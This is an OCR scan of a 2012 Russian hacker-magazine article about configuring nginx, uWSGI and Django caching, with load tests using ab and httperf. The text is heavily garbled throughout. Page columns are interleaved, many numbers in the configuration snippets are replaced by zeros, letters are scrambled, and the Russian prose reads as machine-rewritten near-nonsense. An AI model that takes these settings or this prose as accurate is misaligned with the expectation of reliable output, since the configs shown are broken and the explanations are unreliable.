на сом безвыгодный на а ющихся : пichol.as/benchmaгk-of-python-web-seгveгs ) . Третий вопрос- кеширование. Ясно, ась? минуя кеш а ни за что-то на свете не обойтись равно почто реализован некто полноте от использованием memcached. Др угое дело, в чем дело? геморрой кешировгния многогранна равно ее ре­ шение страшно завязано для специфику самого сайта. В статье ты да я

# vi /etc/nginx/nginx.conf # Для актив максимальной n рои звод да тель н ости делаем # чис л относительно рабочих пр оцессов равным чи сл у nроцессор ны х яде р worker_processes 0 ; # Даем рабо ч им nроцессам больше высок равным образом й nрио р итет worker_priority - 0; #Уменьшаем цифра вызовов get timeofday{), ч тоб ы # н е девать средства во п устую timer_resolution 0eems ; error_log /var/log/nginx/error.log; pid /var/run/nginx.pid; events { # Одновременное число конн е ктов, # обслуж равно ваемых одн да м р або чи м n роцессом worker_connections 0е24 ; # Оnция для того FreeBSD # use kqueue;

рассмотрим до некоторой степени « универсальных>> методов кеширования,

в томище числе топорное укрытие сгенерированных НТМL-страниц на

http {

памяти равно прозрачное кеширование запросов для БД, а в свой черед обсудим специфику применения тех не ведь — не то иных методов. Наконец, да мы со тобой должны чисто всё сие настроить, учитывая особенности используемого железа, формат оперативной памяти и т. д. Вопрос нынешний т акже многогранен, только ряд универсальных рекомендаций все ж таки существует.

ПРИСТУПАЕМ Начнем, на правах да настил ожено, из усище танов ки нужных нам программных

компонентов. Большинство с них очищать на репазитарии любого дис­ трибутива, вследствие чего в этом месте всё просто:

ХАКЕР

03/158/2012

DJАNGОИСПОЛЬЗУЕТВСЮ МОЩЬ ЯЗЫКА

PYTHON, ЧТОБЫ

МАКСИМАЛЬНО РАЗГРУЗИТЬ ПРОГРАММИСТА 125


SYN/ACK

Ш

fог unixoid_Ьlog pгoject.

Django settings

fгom os BASEDIR

impoгt

path

=path.diгnameCpath.abspathC __ file __ ))

DEBUG=r 0 TEMPLATE DEBUG=DEBUG ADMINS=С С 'Evgeny Zobnin' , ), MANAGERS=ADMINS +г

# 'postgгesql_psycopg2',

'sqliteЗ'

DATABASE ENGINE=

'postgгesql',

'mysql',

'sqliteЗ'

в рассуждении

'огасlе'.

DATABASE_NAME='db .sqlite' DATABASE_USER=' ' DATABASE_PASS~ORD

=

DATABASE_HDST= DATABASE_PDRT=' '

# # # #

# Ог path to database file if using sqliteЗ. used with sqliteЗ. used with sqliteЗ. to empty stгing fог localhost. Hot used with sqliteЗ. to empty stгing fог default. Hot used with sqliteЗ .

Not Not Set Set

TIME_ZDNE='Asya/Yekateгinbuгg' settings .py [pythonJ "settings.py" ВЗL, 0'1'15С Стандартный конфиг

#

[1,1J[1%J

Django ОЗУ, seпdfi l ell только лишь вынудит nginx частосвопиться равно тем самым за­

Станда ртные опции

медлит его работу. Оnция tcp_ пopush заставляет ngiпx исполнять

iпclude

/etc/пgiпx)mime.types;

access_log

/var/log/пgiпx/access.log;

НТТР-заголовки на одном танцевальный шаг кете, а возлюбленная бесполезна без участия

# Вкл ючаем ис лечение системного вызова seп dfile( )

sendfile.

GZIР-компрессия вот и все может игрануть со сервером злую шутку.

seпdfile

оп;

С одной стороны, такая комnрессия уменьшаетобъем пере­

tcp_пopush

off;

даваемых сервером данных, вследствие чему спирт можетуспеть

#

Держать kеераliv е-соединение открытым

keepalive_timeout #

Вклю чаем

gzip

05

отдубасить пуще заnросов, от другой- повышает нагрузку получи

секу нд

05 ;

GZI Р-компрессию

процессор, ась? nриводит ко неуклонно nротивоположному результату.

со

станда ртными

Поэтомуточно выяснить, нужна ли возлюбленная тебе, дозволяется лишь экспе­

опциями

оп;

риментальным путем, притом эксnерименты надлежит тянуть

0100 ; gzip_buffers 04 0k ; gzip_comp_level 0; gzip_http_versioп 0 . 0; gzip_proxied апу; gzip_types text/plaiп applicatioп/xml applicatioп/x-javascript text/css;

лещадь предельной нагрузкой .

gzip_miп_leпgth

Теперь самое период разделаться настройки сайта:

vi /etc/пgiпx/sites-eпaЬled/mysite server {

#

#

# На ~ тройки сайтов на отдельных конфигах (3то # станда ртный опись в целях De biaп

Порт

listeп

да

псевдоним

сайта

00 ;

server_пame

host.com;

iпclude /etc/пgiпx/sites-eпaЫed/*;

} Несколько ремарок:

Приоритет рабочих процессов пристало модифицировать из осторожно­ стью, не то они могут без затей <<задавить» совершенно оставшиеся сервисы,

начиная

memcached равно

процессы базы данных. В идеале кризис миновал

подвергнуть проверке работу

nginx вместе с дефолтными

ТЕСТИРОВАНИЕ ПРОИЗВОДИТЕЛЬНОСТИ

настройками да лишь Протестировать режим веб-сервера позволяется из

а там починать для экспериментам.

use kqueue немногоускоряет работу ngiпx кайфовый FгeeBSD благодаря использованию механизма kqueue на смену побольше мед­ ленного epoll. • Системный требование sendfilell применяется чтобы единовременной от­ •

Опция

nравки содержимого целого файла во сокет. Метод вместе с использованием

через утилиты аЬ с комплекта

$

аЬ

-kc 000

-п

Apache:

00000 http://10.1.1.1/

Для сего опять же используется специальная проект httpeгf:

сего вызова работает быстрее, нежели стандартное последователь­

ноекопированиеданных,ипозволяетсэкономитьнаоперативной памяти. Однако, разве сервер оснащен недостаточным числом

026

$ httperf --hog --server=10.1.1.1 \ --wsess=2000,10,2 --rate 000 --timeout 0 ХАКЕР

03/158/201 0


Испытание нагрузкой

# Стандартные настройки журналирования access_log /var/ log / ngin x/ Ьlog-access.log ; error_log /var/ log /n gin x/Ьlog - error.log; # Адрес статики, используемой на админке Django location лN / media / { root / usr / local / lib / python2. 0/ dist-packages / django/contrib/admin; } # Статика самого сайта location л. + \.( jpg[jpeg [g if[png[ico [css [ zip[tgz [g z [rar [bz2[ [pdf[ppt[t xt[tar[ [bmp[js[mov) { root /var /www/host.com

N.

} # Адрес равным образом размер WSGI-гeйтa location / { uwsgi_pass 027.8 . 0.1 : 0812 ; include uwsgi_params;

Здес ь нуль необычного: указываем корневой указатель сайта

/vaг/www/host.com равно а д рес uWSGI-cepвepa

027.0.0.1:8012. При­

ступаем ко настройке Django равным образом uWSGI.

НАСТРОЙКА DJANGO И UWSGI Настроит ь Dj ango интересах совместного использования вместе с uWSGI ужас

DJANGO 0.3 В

Django 0.3 синтаксис определения кеш-бэк - энда изменился равным образом

теnерь имеет нижеследующий вид:

# Пример интересах memcached (два сервера) CACHES={ ' default' : 'BACKEND' : 'django . core.cache.backends.memcached. MemcachedCache' , 'LOCAТION' : [ '172.19.26.248:11211 ' , '172.19 . 06 . 042:11211 ' ,

# Пример ради БА CACHES={ 'default' : { 'BACKEND' : 'django.core.cache.backends.db. DatabaseCache' , 'LOCATION' : 'имя_ таблицы' ,

прос т о. Д ля сего хватит нагнать три простых действия, которые перечислены ниже.

0.

Создать самостоятельно Django-npoeкт:

# cd /var/www # django-admin.py startproject mysite

import django.core.handlers.wsgi applicat ion=django.core.handlers.wsgi.WSGIHandler() 3. Запустить uWSGI-cepвep [опция "-р" определяе т состав

0. Поместить на образован ны й список двойка файла:

рабочих процессовl:

django.xml <uwsgi > <socket> 027.8 .8. 0 :8812 </socket> <pythonpath >/var/www/mysit e/</pythonpath > <module >django_wsgi </module> </uws gi > django_wsgi.py import os os.environ[ 'DJANGO_SETTINGS_MODULE' ]

# uwsgi

0 -s 027.8.8 .1 :8812

Скриптое автозапуска на комплекте uWSGI нет, потому послед­

нюю команду уймись итого вправить куда-нибудь во /etc/гc . local:

# vi /etc/rc.local cd /var/www/mys ite uwsgi -р 0 -s 027.8.8.1:8812

'settings'

НАСТРОЙКА КЕШ-БЭК-ЭНДА Теперь всё по-видимому бы настроено равным образом работает, равно автор переходим к самой интересной равным образом важной части статьи. Кеширование крити­ чески мирово ради быстродействия любого динамического сайта, вне зависимости через технологий, возьми которых некто построе н . Мы должны адаптировать течение переваривания равно отдачи сервером

динамической составляющей. Е сть сколько-нибудь способов решения этой задачи, только в этом месте всё зависит ото специфики веб-сайта. Во-первых, не возбраняется бестолково кешировать всегда от тр аницы сайта. Это

самый безыскусственный равно по отношению ч ень несомненно реализуемый не без; п омо щь ю Dj ango способ. Однако симпатия является равным образом самым неэффективным: что придется из­ менение страницы приведет для промаху мимо иннокентий да повторной загрузке страницы на него. Изменение может присутствовать каким угодно:

включение счетчика получай сайте, пришествие нового коммента­ рия, освежение списка популярных статей равно разделов. Поэтому полное кеширование имеет существо вводить лишь дл ваш покорный слуга более­

не в экий мере статич ны х сайтов словно блогов, не без; л оварей, эн ц иклопедий и т. п.

Во-вторых, дозволяется кешировать данные, загружаемые с БД. Также подумаешь реализуемый, так бог неоднозначный обличье оптимизации. Методы равно бэк-энды кеwирования на

ХАКЕР

03 /158/ 0012

Django

Он результативен лишь только с целью тех сайтов, идеже осуществляется

027


SYN/ACK

счета операций чтения изБДимало операций записи, ага да ведь

CGI glue between Nginx and Django

всего только во томишко случае, буде само х ранилище кеш а работает быстрее

(higher is better)

механизма для еширования базы данных . Другими словами, ке­

0500

ширование результатов цитата с БД подойдет, вдругорядь же, для более-менее статичных сайтов, размещенных получи сервере, кото­ рый имеет зажиточный величина памяти в целях нормальной работы

0000

memcached. В-третьИх, кешировать допускается наездами изменяемые фрагмен­

u

с о (.)

твоя милость шаблонов. Этот прием подойдет чуть было не ради любого сай­

0500

~

та, некто будет дешев и, для мои соображение , особо эффективен.

а;

Однако, на различие с первых двух, некто требует работы напильни­

а.

%!

комок равно никак не имеет прямого взаимоотношения для администрированию в качестве кого

0000

ф

:;,

таковому. Логикой да архитектурой занимаются программисты.

~

Е

Также большое роль имеет запас хранилища чтобы кешире-

000

ванных данных. Djaпgo предлагает нам четверка варианта:

memcached- дорогонько на плане памяти, же адски эффективно; оперативная память- меньше затратно, так равно не в таковой мере эффективно;

холодный диск- ужас неэффективно равным образом весть дешево;

cgi middleware server

основание данных-более эффективно, с грехом пополам дороже.

0

Первые неудовлетворительно подойдут ради владельцев выделенных серве­

0

fcgi (thread ed) gunicam (1 О

fcgi (prefark 0 О gunic am (2 gunicam (5 processors) workers) workers) О uwsgi (2 warkers) 0 uwsgi (5 wa rkers) О uwsgi ( 0О warkers)

0

workers)

ров, последние банан дозволяется использовать получай хостинге инедорогих

VPS'кax. Хотя, конечно, вернее провести собеседование производитель­ ность во реальных условиях да прибрать сугубо благоприятный

Ненагрузачное испытание

uWSGI

вид .

Теперь относительно том, как бы зачислить кеш-хранилище. Здесь всё просто­

открываем settiпgs.py проекта равным образом пишем следующее: а ко , разве твоя милость решил, далеко не чрезвычайно заморачиваясь со настройкой да

# Локальный memcached CACHE_BACKEND='memcached://127.0.0.1:11211/'

шаблонами , выудить некоторой оптимизации, ведь кеширование

#База ей-ей нных ( для ак соз предоставить та блицу,

их одновременное кеширование далеко не имеет смысла, всё же кеши­

всех страниц сайта равным образом записей БД- твой выбор. Сразу скажу, зачем

по части п иса однако н иже)

рование от траниц да записей сообразно отдельности, наравне моя персона уж упоминал,

CACHE_BACKEND='dЬ://имя_таблицы' # Файлова ваш покорный слуга систем а CACHE_BACKEND='filе:///nуть/до/файла' # Оперативная память CACHE_BACKEND='locmem:///' # Фи ко т ивный ке ш (для крат работки ) CACHE_BACKEND='dummy:///'

может одарить благообразный исход получи и распишись сильнее alias не в экий мере статичных са йтах.

Для включения кеширования итого сайта средствами Django достаточно ввезти лишь двум изменения на settiпgs . py:

Во втором случае нуждаться спервоначала сложить таблицу в базе данных. Делается сие вместе с через стандартного maпage.py:

# python manage.py

createcachetaЫe

имя_таблицы

Любой субъект бэк-энда поддерживает следующие аргументы:

timeout- времена жизни кешираванных данных на секундах !по умолчанию 0001; т ахти eпtгies- максимальное численность записей во кеш е !по

# Вкл ю чаем ке ш ирован ие MIDDLEWARE_CLASSES=( # Важ хотя рассеять э ту от троку на нача ле 'django.middleware.cache.CacheMiddleware' , #Здесь иду т весь прочие mi ddleware .. • 'django.middleware.cache.FetchFromCacheMiddleware' , #

Указываем "с ро для

годности"

иннокентий на секундочка х

CACHE_MIDDLEWARE_SECONDS='Зee·

Это всё. Теперь любая сгенерированная с шаблона ступень

умол~а'нию 0001;

хорэ в ловушку во кеш. Просто да тупо. Несколько сильнее интел­

cull_fгequeпcy- дивиденд старых записей, которые удаляются

лектуальный сnособ заключается на исnользованиикешадля

до достижении max_eпtгieslпo умолчанию 0, ведь питаться третья часть всех

хранения результатов выпись во БД . Для его реализации на правах присест

записей!.

равно нужен общепринятый раньше johnпy-cache, что использует

memcached на качестве бэк-энда. Активация осуществляется на три Для передачи аргументов используется синтаксис САСНЕ

BACKEND

CGI,

например:

"locmem:///?timeout=Зe&ma x_eпtries=4ee"

шага. Добавляем johпny-cache во роспись Оjаngо-приложений:

INSTALLED_APPS=( ' j ohnпy' ,

НАИБОЛЕЕ ЭФФЕКТИВНЫЙ МЕТОД КЕШИРОВАНИЯ-СОХРАНЕНИЕ

ТОЛЬКО ИЗБРАННЫХ ЧАСТЕЙ

Далее подключаем подобранный middleware:

MIDDLEWARE_CLASSES=( 'johnny.middleware. LocalStoreClearMiddleware ' , 'johnny.middleware.QueryCacheMiddleware ' ,

СГЕНЕРИРОВАННЫХ ВЕБ-СТРАНИЦ 128

ХАКЕР

03/158/2012


Испытание нагрузкой

Затем указы ва ем на качес тв е кеш-бэк-знда

memcached

равно

аффикс интересах его ключей !чтобы избежать конфл